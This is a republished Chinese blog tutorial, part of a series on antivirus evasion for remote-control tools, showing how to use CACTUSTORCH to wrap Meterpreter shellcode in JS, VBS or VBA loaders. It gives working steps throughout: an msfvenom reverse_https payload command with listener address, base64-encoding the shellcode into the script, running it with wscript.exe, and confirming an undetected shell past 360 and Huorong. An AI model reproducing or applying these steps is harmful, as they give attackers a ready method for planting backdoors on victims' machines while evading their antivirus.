轉(zhuǎn)載：https://mp.weixin.qq.com/s/g0CYvFMsrV7bHIfTnSUJBw

免殺能力一覽表

幾點(diǎn)說明：

1、上表中標(biāo)識(shí) √ 說明相應(yīng)殺毒軟件未檢測出病毒，也就是代表了Bypass。

2、為了更好的對(duì)比效果，大部分測試payload均使用msf的windows/meterperter/reverse_tcp模塊生成。

3、由于本機(jī)測試時(shí)只是安裝了360全家桶和火絨，所以默認(rèn)情況下360和火絨殺毒情況指的是靜態(tài)+動(dòng)態(tài)查殺。360殺毒版本5.0.0.8160(2020.01.01)，火絨版本5.0.34.16(2020.01.01)，360安全衛(wèi)士12.0.0.2002(2020.01.01)。

4、其他殺軟的檢測指標(biāo)是在virustotal.com（簡稱VT）上在線查殺，所以可能只是代表了靜態(tài)查殺能力，數(shù)據(jù)僅供參考，不足以作為免殺或殺軟查殺能力的判斷指標(biāo)。

5、完全不必要苛求一種免殺技術(shù)能bypass所有殺軟，這樣的技術(shù)肯定是有的，只是沒被公開，一旦公開第二天就能被殺了，其實(shí)我們只要能bypass目標(biāo)主機(jī)上的殺軟就足夠了。

一、CACTUSTORCH介紹

在2017年4月由James Forshaw開源了一個(gè)工具DotNetToJScript，能夠利用JS或者Vbs等腳本加載.Net程序。在DotNetToJScript發(fā)布后，有幾款工具根據(jù)其原理開發(fā)出來，比如CACTUSTORCH、SharpShooter、StarFighters等等。

而CACTUSTORCH和SharpShooter都同一個(gè)組織開發(fā)，2017年發(fā)布，主要使用vbs或js執(zhí)行C#的二進(jìn)制payload，提供多種方式繞過殺軟，支持js、vbs、vbe、vba、hta等多種格式，還提供了支持Cobalt Strike的cna文件。

二、安裝CACTUSTORCH

CACTUSTORCH安裝和使用都比較簡單。

1、從Github上clone到本地

git clone https://github.com/mdsecactivebreach/CACTUSTORCH

2、ok了，純綠色版，就這么簡單。

三、CACTUSTORCH說明

CACTUSTORCH生成的腳本可以用于執(zhí)行C#的二進(jìn)制文件，CACTUSTORCH在免殺方面有以下幾個(gè)特性：

1、在payload中不使用Kernel32 API聲明，避免被殺軟檢測

2、可以在C＃二進(jìn)制內(nèi)機(jī)械能混淆

3、可任意指定目標(biāo)二進(jìn)制程序進(jìn)行注入

4、允許指定任意shellcode

5、不產(chǎn)生PowerShell.exe

6、不需要Powershell

7、不需要office

8、不調(diào)用WScript.Shell

9、不需要分段，因?yàn)橥暾臒o階段shellcode可以包含在傳送的payload內(nèi)

10、沒有靜態(tài)父對(duì)子進(jìn)行生成，用戶可以更改wscript.exe生成的內(nèi)容

四、利用CACTUSTORCH生成后門

以生成js腳本為例進(jìn)行測試。

1、首先要選擇一個(gè)待注入的exe文件，默認(rèn)是rundll32.exe, 你也可以使用notepad.exe, calc.exe等，在CACTUSTORCH.js文件中直接修改就行。

2、使用 Cobalt Strike或Metasploit生成一個(gè)32位的shellcode

msfvenom -a x86 -p windows/meterpreter/reverse_https LHOST=10.211.55.2 LPORT=3333 -f raw -o payload.bin

3、執(zhí)行下面命令cat payload.bin | base64 -w 0

4、把生成的base64編碼后的代碼復(fù)制到CACTUSTORCH.js文件中的var code =。

如果是vbs文件，則需要修改CACTUSTORCH.vbs文件中Dim code: code =后面的代碼。

如果是生成VBA代碼，還需要使用splitvba.py來對(duì)代碼進(jìn)行分割，詳細(xì)可查閱官方說明https://github.com/mdsecactivebreach/CACTUSTORCH。

5、在測試機(jī)中執(zhí)行wscript.exe CACTUSTORCH.js

msf中監(jiān)聽windows/meterpreter/reverse_https可正常上線

6、打開殺軟進(jìn)行測試

360和火絨都免殺，都可正常上線

7、測試了一下vbs，也可360和火絨免殺上線

又測試了一下vba，免殺效果也差不多。

五、CACTUSTORCH小結(jié)

因?yàn)镃ACTUSTORCH也是基于DotNetToJScript來實(shí)現(xiàn)免殺的工具，同類工具里知名度比較高，所以被查殺的有些慘不忍睹，不過能直接過360和火絨也算一個(gè)小亮點(diǎn)了。殺軟查殺其腳本主要是里面很多代碼關(guān)鍵字都被列入了特征字符，感興趣的可以嘗試修改其腳本代碼做二次免殺。

六、參考資料

DotNetToJScript 復(fù)活之路:https://evi1cg.me/archives/AMSI_bypass.html

使用CACTUSTORCH 生成Payload:http://4hou.win/wordpress/?p=4727

總結(jié)

以上是生活随笔為你收集整理的远控免杀专题(24)-CACTUSTORCH免杀的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。